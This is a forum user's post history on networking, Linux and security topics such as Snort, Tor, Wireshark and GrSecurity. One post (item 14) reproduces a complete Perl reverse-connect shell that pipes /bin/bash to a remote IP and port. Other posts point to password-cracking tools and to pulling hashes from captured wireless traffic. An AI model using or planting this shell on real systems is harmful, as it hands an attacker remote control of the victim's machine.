chillmaster

Members
  • Content count

    165
  • Joined

  • Last visited

Everything posted by chillmaster

  1. http://www.chill-fu.net/hackdmz/sandbox.php try some searches like perl, python, linux, or network
  2. Samba benchmarks faster than win2k3 last I checked so if you are just looking to setup your own domain controller for fun/learning purposes I suggest trying Linux. Its free gives you a lot of options and when you sit down in front of the real thing (the server wizard in win2k3) you will think you are losing brain cells.
  3. I still swear by tor http://tor.freehaven.net/ but to be honest the anonymity of most proxys can be subverted if someone is actually targeting you. DNS resolution is a big problem for anonymity. see http://wiki.noreply.org/noreply/TheOnionRo...light=%28DNS%29
  4. http://www.chill-fu.net/hackdmz/forum/viewtopic.php?t=89 See that link for my screenshot. WM: Fluxbox Terminal: Eterm dockapp: Gkrellm
  5. I know everyone knows about securityfocus.com but do they know about http://www.securityfocus.com/bid ? Its an old bookmark I have and I couldnt figure out how to get back to it from the new homepage.
  6. if you have time get a spare box and install snort! http://snort.org/ some of the things an IDS can do is detect portscans, brute force attempts. They are usually packet sniffers built with rules. These rules usualy define when to take an action. They can also detect arpspoofing on a network usually. Here is a list of rules from snort.conf include $RULE_PATH/local.rules include $RULE_PATH/bad-traffic.rules include $RULE_PATH/exploit.rules include $RULE_PATH/scan.rules include $RULE_PATH/finger.rules include $RULE_PATH/ftp.rules include $RULE_PATH/telnet.rules include $RULE_PATH/rpc.rules include $RULE_PATH/rservices.rules include $RULE_PATH/dos.rules include $RULE_PATH/ddos.rules include $RULE_PATH/dns.rules include $RULE_PATH/tftp.rules include $RULE_PATH/web-cgi.rules include $RULE_PATH/web-coldfusion.rules include $RULE_PATH/web-iis.rules include $RULE_PATH/web-frontpage.rules include $RULE_PATH/web-misc.rules include $RULE_PATH/web-client.rules include $RULE_PATH/web-php.rules include $RULE_PATH/sql.rules
  7. Hey at least I didnt say go read all the RFC documents on the following protocols... look when it comes down to it, you have to ask yourself Do you know how ports work? Do you understand not all network traffic utilizes ports? Do you know what a SYN or an ACK is? what about a ARP or RARP Do you understand what protocols utilize these? Why? How? Because what you are looking at in ethereal/wireshark is the ASCII representation of each one of those packets. If you dont understand how the packets relate to one another you will be lost.
  8. The best way to understand wireshark/ethereal output is to understand how internet communications work. Start with the OSI model http://en.wikipedia.org/wiki/OSI_model While data is being transfered across a network, each layer adds its own header to the data. Eventually this creates the entire packet with the protocols used at each layer. This is the stuff you need to familiarize yourself with if you wish to be fluent at reading network traffic.
  9. http://www.eve-online.com/ They love python for its non-threading goodness
  10. You can easily mitigate MOST rootkit attempts (if your system has been hacked that far) just by using GrSecurity. GrSecurity.org
  11. 2 days ago there was an update to the current lawsuit pending against AT&T http://www.eff.org/news/archives/2006_11.php#004990 http://www.chill-fu.net/hackdmz/forum/view...c.php?p=573#573
  12. Ya thats your best bet if you have a predetermined target with information there for you to gather. Otherwise it is simple enough to hack around with brutus,jtr, or rainbow table techniques
  13. cant go wrong with bugtraq, but you can subscribe through securityfocus so you might already have it
  14. reverse shell in perl #!/usr/bin/perl -w #################################################################### # # PERL reverse connect shell # --intropy-- # intropy [at] caughq [dot] org # # This is in the cau-aimshell just thought id rip it out and give # it to you in case you want it. Nothing fancy and kinda sloppy. # # Enjoy # #################################################################### use strict; use Socket; use IO::Socket; # Get our IP and Port my $ip = $ARGV[0] || "10.1.1.33"; my $port = $ARGV[1] || "5100"; # Define our socket my $domain = PF_INET; my $type = SOCK_STREAM; my $proto = getprotobyname('tcp'); # Call socket with handle socket(SOCKHAND, $domain, $type, $proto) or die "socket: $!\n"; # Define our connect my $nip = inet_aton($ip); my $sockaddr = sockaddr_in($port, $nip); # Call connect passing handle connect(SOCKHAND, $sockaddr) or die "connect: $!\n"; open(STDIN, ">&SOCKHAND"); open(STDOUT, ">&SOCKHAND"); open(STDERR, ">&SOCKHAND"); if (my $pid = fork) { print("[!] Opened process with pid [$pid]\n"); exit(0); } else { # Execute our shell system('/bin/bash') or die "system: $!\n"; close(SOCKHAND); } a C example http://www.chill-fu.net/nc.c
  15. The only problem I see is when I just want a single package to update. It wouldnt be worth opening a dozen connections for a single file, especially considering the size of most linux packages. It would be nifty to see a service that understood what packages you needed to update then generate a tardball on the fly. At that point a package manager could take over again and download that file over torrent. Bittorrent is a pretty connection intensive protocol and most consumer routers *could* be crippled. I know there are many times that cable users can barely voip and torrent at the same time. Now imagine a production network. More bandwidth true, but more connections on the router as well.
  16. According to my parents computer, I can't delete Admin account, due to it being the main guy of the computer, without that, you're f*cked :> --- with the 2-3 weeks you've spent trying to sort this out, surely you could have typed up all your 'homework' and stuff? Or at least used one of the many methods people have posted already? I thought all laptops came with a USB drive? There is always system
  17. Maybe you should change your signature then. "I know to much" maybe it should say too* maybe not?
  18. An entire packet is more information than you need. The packet is encapsulated multiple times before and probably also after the data your looking for is encrypted. You need to find the specific data you want to decrypt inside the packet, extract it, THEN decrypt it.
  19. PHP forms that generate emails are really popular. Try hotscripts.com or something, I really dont feel like googling right now.
  20. http://34n118w.net/130/The_Google_Hackers_Guide_v1.0.pdf Thanks to http://johnny.ihackstuff.com
  21. what i do in a situation like this. i usually get angry, scream, yell, curse at the machine. and then i completely start over from scratch. i hate doing it, but all the books i have usually don't help any. last night i had a grub 13 i think, after putting ubuntu over Suse. if you can, do it over. hmm sounds like an old windows user. Its a good idea to investigate the problem at least because more often than not in Linux there is an easy solution. I agree that a fresh install in windows is a VERY good idea. The TOC of mainting windows definitly doesnt warrant attempting to fix the problem, DOS is almost useless and most of the training and advice says reinstall so you really dont have a choice. Dont be afraid to learn something. Edit: Sorry. Anyways, what I would do in this situation would use a livecd to install grub over again (I prefer grub) and configure it correctly.
  22. To "decode" the packet all you need to do is print the data in whatever form you want to read it in. wireshark will automaticly display the packets in ASCII I believe. I think you meant decrypting though, thats a little bit trickier because you have to first understand the type of traffic you are reading then you have to understand the protocols and how the type of communication implements the encryption and what encryption algorithm(sp) is being used. Eventually you will have to crack the encryption and that is another task altogether.
  23. http://www.google.com/search?q=background+check
  24. Almost any network monitor will pick up packets off of your wireless interface if you are already connected/authenticated ethereal/wireshark, tcpdump, the list continues The problem related to your question is when it comes to extracting the hashes from the traffic. If you know what your looking for just dump the traffic and you will find the hash. Beyond that more reading is required.
  25. I am running a pentium D on gentoo and an amd64 portage profile You have to run some binaries (edit: 32bit binaries for flash in firefox, ect) but overall the support is awsome. I have very little issues, infact I even got as far as setting up grsec with pax and everything, works perfectly. If 64bit Linux is something you want to try I would go with gentoo. I think even wikipedia says something about gentoo having awsome 64bit support. http://en.wikipedia.org/wiki/64_bit